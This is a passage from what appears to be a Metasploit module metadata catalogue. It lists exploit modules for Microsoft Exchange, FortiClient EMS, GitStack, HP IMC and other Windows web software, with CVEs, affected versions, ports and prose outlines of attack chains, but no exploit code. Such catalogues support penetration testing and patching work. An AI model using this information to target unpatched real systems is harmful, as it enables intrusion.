"This vulnerability allows remote attackers to execute arbitrary code\n on affected installations of Exchange Server. Authentication is\n required to exploit this vulnerability. Additionally, the target user\n must have the \"Data Loss Prevention\" role assigned and an active\n mailbox.\n\n If the user is in the \"Compliance Management\" or greater \"Organization\n Management\" role groups, then they have the \"Data Loss Prevention\"\n role. Since the user who installed Exchange is in the \"Organization\n Management\" role group, they transitively have the \"Data Loss\n Prevention\" role.\n\n The specific flaw exists within the processing of the New-DlpPolicy\n cmdlet. The issue results from the lack of proper validation of\n user-supplied template data when creating a DLP policy. An attacker\n can leverage this vulnerability to execute code in the context of\n SYSTEM.\n\n Tested against Exchange Server 2016 CU19 on Windows Server 2016.", - "references": [ - "CVE-2020-16875", - "CVE-2020-17132", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", - "URL-https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016", - "URL-https://srcincite.io/advisories/src-2020-0019/", - "URL-https://srcincite.io/pocs/cve-2020-16875.py.txt", - "URL-https://srcincite.io/pocs/cve-2020-16875.ps1.txt", - "URL-https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html", - "URL-https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Exchange Server <= 2016 CU19 and 2019 CU8" - ], - "mod_time": "2021-04-29 21:26:02 +0000", - "path": "/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb", - 
"is_install_path": true, - "ref_name": "windows/http/exchange_ecp_dlp_policy", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "account-lockouts", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_ecp_viewstate": { - "name": "Exchange Control Panel ViewState Deserialization", - "fullname": "exploit/windows/http/exchange_ecp_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-11", - "type": "exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. 
With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.", - "references": [ - "CVE-2020-0688", - "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)", - "Windows (cmd)" - ], - "mod_time": "2020-08-21 10:13:45 +0000", - "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_ecp_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_proxylogon_rce": { - "name": "Microsoft Exchange ProxyLogon RCE", - "fullname": "exploit/windows/http/exchange_proxylogon_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-03-02", - "type": "exploit", - "author": [ - "Orange Tsai", - "Jang ( ", - "mekhalleh (RAMELLA Sébastien)", - "print(\"\")", - "lotusdll", - "Praetorian" - ], - "description": "This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 
15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.", - "references": [ - "CVE-2021-26855", - "CVE-2021-27065", - "LOGO-https://proxylogon.com/images/logo.jpg", - "URL-https://proxylogon.com/", - "URL-http://aka.ms/exchangevulns", - "URL-https://www.praetorian.com/blog/reproducing-proxylogon-exploit", - "URL-https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265", - "URL-https://www.o2oxy.cn/3169.html", - "URL-https://github.com/praetorian-inc/proxylogon-exploit", - "URL-https://github.com/Zeop-CyberSec/proxylogon_writeup" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell", - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxylogon_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ], - "AKA": [ - "ProxyLogon" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/exchange_proxynotshell_rce": { - "name": "Microsoft Exchange ProxyNotShell RCE", - "fullname": "exploit/windows/http/exchange_proxynotshell_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-09-28", - "type": "exploit", - "author": [ - "Orange Tsai", - "Spencer McIntyre", - "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q", - "Piotr Bazydło", - "Rich Warren", - "Soroush 
Dalili" - ], - "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.", - "references": [ - "CVE-2022-41040", - "CVE-2022-41082", - "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend", - "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/", - "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9", - "URL-https://rw.md/2022/11/09/ProxyNotRelay.html" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-11-28 10:06:14 +0000", - "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxynotshell_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "AKA": [ - "ProxyNotShell" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/exchange_proxyshell_rce": { - "name": "Microsoft Exchange ProxyShell RCE", - "fullname": "exploit/windows/http/exchange_proxyshell_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-04-06", - "type": "exploit", - "author": 
[ - "Orange Tsai", - "Jang ( ", - "PeterJson", - "brandonshi123", - "mekhalleh (RAMELLA Sébastien)", - "Donny Maasland", - "Rich Warren", - "Spencer McIntyre", - "wvu " - ], - "description": "This module exploits a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.", - "references": [ - "CVE-2021-34473", - "CVE-2021-34523", - "CVE-2021-31207", - "URL-https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "URL-https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf", - "URL-https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/", - "URL-https://github.com/dmaasland/proxyshell-poc" - ], - "platform": "Windows", - "arch": "cmd, x64, x86", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Powershell", - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-12-02 15:55:10 +0000", - "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/exchange_proxyshell_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "AKA": 
[ - "ProxyShell" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ezserver_http": { - "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability", - "fullname": "exploit/windows/http/ezserver_http", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-18", - "type": "exploit", - "author": [ - "modpr0be " - ], - "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.", - "references": [ - "OSVDB-83065", - "BID-54056", - "EDB-19266", - "URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ezserver_http.rb", - "is_install_path": true, - "ref_name": "windows/http/ezserver_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/fdm_auth_header": { - "name": "Free Download Manager Remote Control Server Buffer Overflow", - "fullname": "exploit/windows/http/fdm_auth_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-02-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. 
When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-0183", - "OSVDB-51745" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Free Download Manager 2.5 Build 758" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/fdm_auth_header.rb", - "is_install_path": true, - "ref_name": "windows/http/fdm_auth_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/file_sharing_wizard_seh": { - "name": "File Sharing Wizard - POST SEH Overflow", - "fullname": "exploit/windows/http/file_sharing_wizard_seh", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-09-24", - "type": "exploit", - "author": [ - "x00pwn", - "Dean Welch " - ], - "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.", - "references": [ - "CVE-2019-16724", - "EDB-47412" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Vista / Windows 7 (x86)" - ], - "mod_time": "2020-03-05 14:48:37 +0000", - "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb", - "is_install_path": true, - "ref_name": "windows/http/file_sharing_wizard_seh", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/flexdotnetcms_upload_exec": { - "name": "FlexDotnetCMS Arbitrary ASP File Upload", - "fullname": 
"exploit/windows/http/flexdotnetcms_upload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-09-28", - "type": "exploit", - "author": [ - "Erik Wynter" - ], - "description": "This module exploits an arbitrary file upload vulnerability in\n FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary\n commands with elevated privileges.\n\n The module first tries to authenticate to FlexDotnetCMS via an HTTP\n POST request to `/login`. It then attempts to upload a random TXT\n file and subsequently uses the FlexDotnetCMS file editor to rename\n the TXT file to an ASP file. If this succeeds, the target is\n vulnerable and the ASP file is generated as a copy of the TXT file,\n which remains on the server.\n\n Next, the module sends another request to rename the TXT file to an\n ASP file, this time adding the payload. Finally, the module tries\n to execute the ASP payload via a simple HTTP GET request to\n `/media/uploads/asp_payload`\n\n Valid credentials for a FlexDotnetCMS user with permissions to use\n the FileManager are required. 
This module has been successfully\n tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.", - "references": [ - "CVE-2020-27386" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows (x86)", - "Windows (x64)" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/flexdotnetcms_upload_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/flexdotnetcms_upload_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/forticlient_ems_fctid_sqli": { - "name": "FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE", - "fullname": "exploit/windows/http/forticlient_ems_fctid_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-04-21", - "type": "exploit", - "author": [ - "Zach Hanley", - "James Horseman", - "jheysel-r7", - "Spencer McIntyre" - ], - "description": "An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).\n FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized\n platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which\n can be sent directly into database queries.\n\n FcmDaemon.exe is the main service responsible for communicating with enrolled clients. 
By default it listens on port 8013\n and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.\n In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable\n SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code\n execution in the context of NT AUTHORITY\\SYSTEM\n\n Affected versions of FortiClient EMS include:\n 7.2.0 through 7.2.2\n 7.0.1 through 7.0.10\n\n Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.\n\n It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient\n EMS for the necessary vulnerable services to be available.", - "references": [ - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/", - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/", - "URL-https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py", - "CVE-2023-48788" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8013, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-07-25 09:14:27 +0000", - "path": "/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb", - "is_install_path": true, - "ref_name": "windows/http/forticlient_ems_fctid_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/fortilogger_arbitrary_fileupload": { - "name": "FortiLogger Arbitrary File Upload Exploit", - 
"fullname": "exploit/windows/http/fortilogger_arbitrary_fileupload", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-26", - "type": "exploit", - "author": [ - "Berkan Er " - ], - "description": "This module exploits an unauthenticated arbitrary file upload\n via insecure POST request. It has been tested on versions < 5.2.0 in\n Windows 10 Enterprise.", - "references": [ - "CVE-2021-3378", - "URL-https://erberkan.github.io/2021/cve-2021-3378/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "FortiLogger < 5.2.0" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/http/fortilogger_arbitrary_fileupload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "unreliable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/generic_http_dll_injection": { - "name": "Generic Web Application DLL Injection", - "fullname": "exploit/windows/http/generic_http_dll_injection", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-03-04", - "type": "exploit", - "author": [ - "Matthew Hall " - ], - "description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. 
This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.", - "references": [ - "CWE-427" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/generic_http_dll_injection.rb", - "is_install_path": true, - "ref_name": "windows/http/generic_http_dll_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/geutebrueck_gcore_x64_rce_bo": { - "name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE", - "fullname": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-01-24", - "type": "exploit", - "author": [ - "Luca Cappiello", - "Maurice Popp" - ], - "description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).", - "references": [ - "EDB-41153", - "CVE-2017-11517", - "URL-https://www.geutebrueck.com" - ], - "platform": "Windows", - "arch": "", - "rport": 13003, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "GCore 1.3.8.42, Windows x64 (Win7+)", - "GCore 1.4.2.37, Windows x64 (Win7+)" - ], - "mod_time": "2024-04-17 13:00:41 +0000", - "path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb", - "is_install_path": true, - "ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo", - "check": true, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/git_lfs_rce": { - "name": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", - "fullname": "exploit/windows/http/git_lfs_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-11-04", - "type": "exploit", - "author": [ - "Dawid Golunski", - "space-r7", - "jheysel-r7" - ], - "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker’s malicious repository using a vulnerable Git version control tool", - "references": [ - "CVE-2020-27955", - "URL-https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Git LFS <= 2.12" - ], - "mod_time": "2021-09-14 16:32:25 +0000", - "path": "/modules/exploits/windows/http/git_lfs_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/git_lfs_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/gitstack_rce": { - "name": "GitStack Unsanitized Argument RCE", - "fullname": "exploit/windows/http/gitstack_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-01-15", - "type": "exploit", - "author": [ - "Kacper Szurek", - "Jacob Robles" - ], - "description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n 
being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.", - "references": [ - "CVE-2018-5955", - "EDB-43777", - "EDB-44044", - "URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/gitstack_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/gitstack_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_autopass_license_traversal": { - "name": "HP AutoPass License Server File Upload", - "fullname": "exploit/windows/http/hp_autopass_license_traversal", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-01-10", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. 
The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.", - "references": [ - "CVE-2013-6221", - "ZDI-14-195", - "BID-67989", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125" - ], - "platform": "Java", - "arch": "java", - "rport": 5814, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_autopass_license_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_imc_bims_upload": { - "name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal", - "fullname": "exploit/windows/http/hp_imc_bims_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. 
This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.", - "references": [ - "CVE-2013-4822", - "OSVDB-98247", - "BID-62895", - "ZDI-13-238", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_bims_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_imc_java_deserialize": { - "name": "HP Intelligent Management Java Deserialization RCE", - "fullname": "exploit/windows/http/hp_imc_java_deserialize", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-10-03", - "type": "exploit", - "author": [ - "Steven Seeley (mr_me) of Offensive Security", - "Carsten " - ], - "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.", - "references": [ - "CVE-2017-12557", - "URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/" - ], - "platform": "Windows", - "arch": "", - "rport": "8080", - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HPE IMC 7.3 E0504P2 and earlier / Windows" - ], - "mod_time": "2021-02-16 14:36:38 +0000", - "path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_java_deserialize", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_imc_mibfileupload": { - "name": "HP Intelligent Management Center Arbitrary File Upload", - "fullname": "exploit/windows/http/hp_imc_mibfileupload", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-03-07", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in the mibFileUpload which is accepting unauthenticated\n file uploads and handling zip contents in an insecure way. Combining both weaknesses\n a remote attacker can accomplish arbitrary file upload. 
